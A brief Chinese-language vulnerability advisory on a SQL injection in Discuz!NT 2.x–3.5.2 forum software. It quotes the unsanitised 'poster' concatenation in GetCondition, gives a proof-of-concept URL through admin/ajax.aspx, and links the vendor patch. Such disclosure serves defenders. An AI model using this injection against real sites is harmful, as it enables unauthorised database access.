影响版本:
Discuz!NT 2.*-3.5.2
漏洞描述:
Discuz!NT 是康盛创想(Comsenz)旗下的一款功能强大的基于 ASP.NET 平台的社区软件。ajaxtopicinfo.ascx用户控件 poster SQL注入漏洞。结合ajax.aspx调用任意用户控件漏洞 admin/UserControls/ ajaxtopicinfo.ascx 函数 GetCondition (WebsiteManage.cs) //62 行 if (posterlist != "") { string[] poster = posterlist.Split(','); condition += " AND [poster] in ("; string tempposerlist = ""; foreach (string p in poster) { tempposerlist += "'" + p + "',"; } if (tempposerlist != "") tempposerlisttempposerlist = tempposerlist.Substring(0, tempposerlist.Length - 1); condition += tempposerlist + ")";
测试方法:
本站提供程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负!
http://localhost:25594/admin/ajax.aspx?AjaxTemplate=ajaxtopicinfo.ascx&poster=1' )字符串 ') AND [tid]>=1 AND [tid]<=1' 后的引号不完整。由于错误信息被隐藏了,但SQL语句会被执行的。
安全建议:
官方补丁http://nt.discuz.net/showtopic-135589.html
0 条评论。